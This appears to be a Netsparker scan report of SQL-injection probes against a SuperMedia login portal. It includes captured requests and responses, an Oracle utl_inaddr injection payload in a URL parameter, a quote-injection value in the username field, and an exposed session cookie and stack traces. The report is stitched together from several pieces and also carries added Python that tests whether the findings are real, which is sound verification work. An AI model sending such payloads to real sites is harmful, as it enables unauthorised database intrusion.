<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="Account Setup Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map['method' -> 'setupForm']] in state 'enterCriteria' of flow 'loginact-flow' -- action execution attributes were 'map['method' -> 'setupForm']'; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). 
--- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40ORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT", line 138ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8";s.prop8="";s.prop9="";s.prop10="2FF790FDB315C80023FC621E3266E6C1.app7-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
<!-- Header Start -->
<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">
<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>
<!-- Roll-over navigation menus -->


<!-- Header End -->
</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
No such flow definition with id &#039;&#039;||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;accountAdmin-flow&#039;, &#039;accountreg-flow&#039;, &#039;businessprofile-flow&#039;, &#039;client-consolidation-flow&#039;, &#039;contactus-flow&#039;, &#039;coupon-flow&#039;, &#039;forgotpassword-edit-flow&#039;, &#039;funding-flow&#039;, &#039;lead-maintain-flow&#039;, &#039;listingOrderSummary-flow&#039;, &#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;, &#039;microsite-flow&#039;, &#039;myaccount-contactinfo-edit-flow&#039;, &#039;myaccount-domains-flow&#039;, &#039;myaccount-email-edit-flow&#039;, &#039;myaccount-emails-flow&#039;, &#039;myaccount-flow&#039;, &#039;myaccount-password-edit-flow&#039;, &#039;myaccount-websites-flow&#039;, &#039;onlinecc-flow&#039;, &#039;ordersummary-flow&#039;, &#039;paypercall-flow&#039;, &#039;pfc-businessprofile-flow&#039;, &#039;pfc-flow&#039;, &#039;pfp-adDesign-flow&#039;, &#039;pfp-categories-flow&#039;, &#039;pfp-elp-flow&#039;, &#039;pfp-geo-flow&#039;, &#039;pfp-keywords-flow&#039;, &#039;photos-flow&#039;, &#039;ppc-advsearch-flow&#039;, &#039;ppc-bidding-flow&#039;, &#039;ppc-create-flow&#039;, &#039;ppc-fullservice-flow&#039;, &#039;ppc-maintain-flow&#039;, &#039;repmanagement-flow&#039;, &#039;reviews-flow&#039;, &#039;sclicks-maintain-flow&#039;, &#039;sharethewealth-flow&#039;, &#039;temporary-password-flow&#039;, &#039;webhosting-addons-flow&#039;, &#039;webhosting-design-flow&#039;, &#039;webhosting-domainnames-flow&#039;, &#039;webhosting-email-products-flow&#039;, &#039;webhosting-websites-flow&#039;]
</div>

</div>
</div>
<div >
<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).h..
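The first finding above is one to verify by hand rather than take from the ORA- text alone. The body of the captured response is Spring Web Flow's registry error: it echoes the `_flowId` value back and lists the flow ids it does know, while the ORA-28232 trace on the same page sits in the Omniture `s.prop7` variable and belongs to the login action, not to this parameter. The `chr()` chain in the payload spells out a canary that `utl_inaddr.get_host_address` would fail to resolve, and a true positive would hand that canary back inside an ORA-29257 "host ... unknown" message. The Python below, added here as an example and not part of the Netsparker report or of the application, decodes the canary, checks whether any ORA- message in the response actually contains it, and pulls out the disclosed flow list. The response excerpt is constructed from the captured body; `HYPOTHETICAL_ORACLE_HIT` is invented to show what a real hit would look like.

```python
import re
from html import unescape

# The _flowId value from the report's first request, one URL-decode removed.
FLOWID_PAYLOAD = ("'||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)"
                  "||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)"
                  "||chr(109)||chr(97) from DUAL)))||'")

# Constructed excerpt of the report's first response: the flow registry
# rejects the id and lists real flows, while an unrelated ORA-28232 trace
# is carried in the Omniture s.prop7 variable further up the page.
FLOWID_PROBE_RESPONSE = """<script>s.prop7="... ORA-28232: invalid input length for obfuscation toolkit ...";</script>
<div id="bodyfooterwrap">
<h4>An Error has occurred in this application. Please try back at a later time.</h4>
No such flow definition with id &#039;&#039;||(utl_inaddr.get_host_address((select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))||&#039;&#039; found; the flows available are: array&lt;String&gt;[&#039;login-flow&#039;, &#039;loginact-flow&#039;, &#039;maintaincreditcard-flow&#039;]
</div>"""

# Hypothetical response if the expression had reached Oracle: UTL_INADDR
# cannot resolve the canary as a host name and names it in the error.
HYPOTHETICAL_ORACLE_HIT = """<div id="bodyfooterwrap">
ORA-29257: host _!@3dilemma unknown
</div>"""


def decode_chr_chain(payload):
    """Rebuild the string that chr(95)||chr(33)||... would produce in Oracle."""
    return "".join(chr(int(n)) for n in re.findall(r"chr\((\d+)\)", payload, re.I))


def oracle_errors(response_html):
    """All ORA-nnnnn messages in the decoded page text, in order."""
    return re.findall(r"ORA-\d{5}[^<\n\"]*", unescape(response_html))


def available_flows(response_html):
    """Flow ids disclosed by Spring Web Flow's 'No such flow definition' message."""
    text = unescape(response_html)
    m = re.search(r"the flows available are: array<String>\[(.*?)\]", text, re.S)
    return re.findall(r"'([^']+)'", m.group(1)) if m else []


def classify(payload, response_html):
    """What the response proves about the probe.

    'oracle-error-with-canary': an ORA- message contains the canary, so the
                                database evaluated the injected expression.
    'reflected-only'          : the payload is echoed back (here by the flow
                                registry) and no ORA- message carries the
                                canary; ORA- text elsewhere on the page is
                                not evidence for this parameter.
    'no-signal'               : neither.
    """
    text = unescape(response_html)
    canary = decode_chr_chain(payload)
    if canary and any(canary in err for err in oracle_errors(response_html)):
        return "oracle-error-with-canary"
    if payload.strip("'") in text or "No such flow definition" in text:
        return "reflected-only"
    return "no-signal"


if __name__ == "__main__":
    print("canary:", decode_chr_chain(FLOWID_PAYLOAD))
    print("first response:", classify(FLOWID_PAYLOAD, FLOWID_PROBE_RESPONSE))
    print("disclosed flows:", available_flows(FLOWID_PROBE_RESPONSE))
    print("hypothetical hit:", classify(FLOWID_PAYLOAD, HYPOTHETICAL_ORACLE_HIT))
```

Run against the captured body this classifies the `_flowId` probe as reflected only, which is why the report could not confirm it. The flow list the registry error discloses (ids such as `maintaincreditcard-flow` and `temporary-password-flow` in the real response) is a finding in its own right and a good starting list for the manual follow-up.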
- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=%2527&password=3&=3&_flo..

Parameters

Parameter Type Value
fromPage GET index
username GET %27
password GET 3
GET 3
_flowId GET loginact-flow

Request

GET /spportal/spportalFlow.do?fromPage=index&username=%2527&password=3&=3&_flowId=loginact-flow HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=2FF790FDB315C80023FC621E3266E6C1.app7-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=RVU
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:59:22 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6062

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>
<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>
<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="";s.prop7="";s.prop8="";s.prop9="";s.prop10="";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >
<!-- Header Start -->
<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">
<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>
<!-- Roll-over navigation menus -->


<!-- Header End -->
</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Exception thrown executing [AnnotatedAction@41890a55 targetAction = com.idearc.ssa.web.spring.LoginActAction@4a943bb9, attributes = map[&#039;method&#039; -&gt; &#039;setupForm&#039;]] in state &#039;enterCriteria&#039; of flow &#039;loginact-flow&#039; -- action execution attributes were &#039;map[&#039;method&#039; -&gt; &#039;setupForm&#039;]&#039;; nested exception is org.springframework.jdbc.UncategorizedSQLException: SqlMapClient operation; uncategorized SQLException for SQL []; SQL state [99999]; error code [28232]; --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8; nested exception is com.ibatis.common.jdbc.exception.NestedSQLException: --- The error occurred in ibatis/maps/GenericServices.xml. --- The error occurred while applying a parameter map. --- Check the GenericServices.getDecryptValue-InlineParameterMap. --- Check the statement (query failed). --- Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation toolkitORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT_FFI&#034;, line 40ORA-06512: at &#034;SYS.DBMS_OBFUSCATION_TOOLKIT&#034;, line 138ORA-06512: at &#034;PSMGR.DECRYPT_FUNCTION&#034;, line 8
</div>

</div>
</div>
<div >
<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>



<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
..
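The second and third findings (the one above and the one that follows) turn on a different error: ORA-28232 from `DBMS_OBFUSCATION_TOOLKIT`, reached through `PSMGR.DECRYPT_FUNCTION` and the iBATIS `GenericServices.getDecryptValue` parameter map. That code is what the toolkit's DES routines raise when their input is not a multiple of 8 bytes, so a lone `'` (or the `%27` the parameter table shows, which is the request's `%2527` after one decode) trips it whether or not the quote ever changed a SQL statement. The manual check the summary asks for is therefore differential: send a metacharacter-free control of the same length, and a block-aligned one, and compare the ORA- codes. The Python below is an added example, not scanner or application code; it runs that comparison on a constructed excerpt of the captured error text, and `CLEAN_RESPONSE` and the control outcomes are hypothetical. Two other things the captured traffic shows that belong in the write-up regardless of the injection verdict: `username` and `password` travel as GET query parameters, and the `JSESSIONID` cookie value is copied into the analytics variable `s.prop10` in the response.

```python
import re
from urllib.parse import unquote

# DBMS_OBFUSCATION_TOOLKIT's DES routines require input in 8-byte blocks;
# ORA-28232 is what they raise otherwise.
DES_BLOCK_BYTES = 8

# Constructed excerpt of the error text in the report's captured responses.
ORA_28232_RESPONSE = (
    "Exception thrown executing [AnnotatedAction@41890a55 ...] in state "
    "'enterCriteria' of flow 'loginact-flow' ... nested exception is "
    "org.springframework.jdbc.UncategorizedSQLException: ... error code [28232]; "
    "--- Check the GenericServices.getDecryptValue-InlineParameterMap. --- "
    "Cause: java.sql.SQLException: ORA-28232: invalid input length for obfuscation "
    'toolkitORA-06512: at "SYS.DBMS_OBFUSCATION_TOOLKIT_FFI", line 40'
    'ORA-06512: at "PSMGR.DECRYPT_FUNCTION", line 8'
)

# Hypothetical page returned for a value the application accepts without error.
CLEAN_RESPONSE = "<title>SuperPages - Sign In</title>Invalid user name or password"


def decode_layers(raw):
    """Every URL-decoding layer of a value, e.g. %2527 -> %27 -> '."""
    layers = [raw]
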